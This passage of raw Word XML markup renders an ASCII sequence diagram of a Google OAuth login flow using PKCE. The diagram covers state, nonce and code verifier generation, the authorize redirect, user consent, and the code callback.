                                </w:rPr>
                                <w:t>│ 1. GET /auth/google/redirect                            │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2421" name="Rectangle 2421"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="669379"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="54658CD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2" name="Rectangle 2422"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="669379"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="693EEC8A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>├───────────────────────────►│                            │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2423" name="Rectangle 2423"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="840829"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1D497F6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4" name="Rectangle 2424"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="840829"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1BEF6FD1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">│                            │ generate state, </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">nonce,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5" name="Rectangle 2425"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1012267"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="09E2C0E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6" name="Rectangle 2426"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="1012267"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="77080387"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spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>code_verifier</w:t>
                              </w:r>
                              <w:proofErr w:type="spell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7" name="Rectangle 2427"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1183717"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7E5B5003"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28" name="Rectangle 2428"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="1183717"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3BF45B68" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│                            │ challenge = S256(verifier) │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2429" name="Rectangle 2429"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1355167"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0C6D866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0" name="Rectangle 2430"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="1355167"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2CB8249D"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gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>cache{</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">state → </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">verifier,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1" name="Rectangle 2431"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1526617"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="491B238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2" name="Rectangle 2432"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="1526617"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="140FF974"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gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>nonce}  5</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> min TTL   │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2433" name="Rectangle 2433"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1698067"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3F72B6D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4" name="Rectangle 2434"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="1698067"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0AA720B5" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│ 2. {</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>authorize_url</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">, </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>state}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5" name="Rectangle 2435"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="1869517"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="03E7F6E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6" name="Rectangle 2436"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="1869517"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4C0DAB4B" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│◄───────────────────────────┤                            │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2437" name="Rectangle 2437"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="2040967"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="67ADCD40"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38" name="Rectangle 2438"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="2040967"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="753BDE73" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│                            │                            │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2439" name="Rectangle 2439"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="2212417"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5383A42C"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40" name="Rectangle 2440"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="2212417"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="70DCF38E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│ 3. navigate (</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>client_id</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">, </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>redirect_uri</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">, state, </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">nonce,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41" name="Rectangle 2441"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="2383867"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="17D3E41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42" name="Rectangle 2442"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="2383867"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="08B82DA2" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">│              </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>code_challenge</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>, S256, scope=</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>openid</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>email)  │</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2443" name="Rectangle 2443"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="2555317"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5AB7A0D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44" name="Rectangle 2444"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="2555317"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4B4242BF"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2445" name="Rectangle 2445"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="2726767"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6368CC62"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46" name="Rectangle 2446"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="2726767"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2DD0E9C3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>│                            │           user consents    │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2447" name="Rectangle 2447"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="2907742"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="42F98D76"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48" name="Rectangle 2448"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="2907742"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0501DCB6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve">│ 4. </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>redirect ?code</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>=…&amp;state=…                             │</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2449" name="Rectangle 2449"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="3079192"/>
                            <a:ext cx="289746" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5B1337C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0" name="Rectangle 2450"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="318641" y="3079192"/>
                            <a:ext cx="4273754" cy="130905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="150053F6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
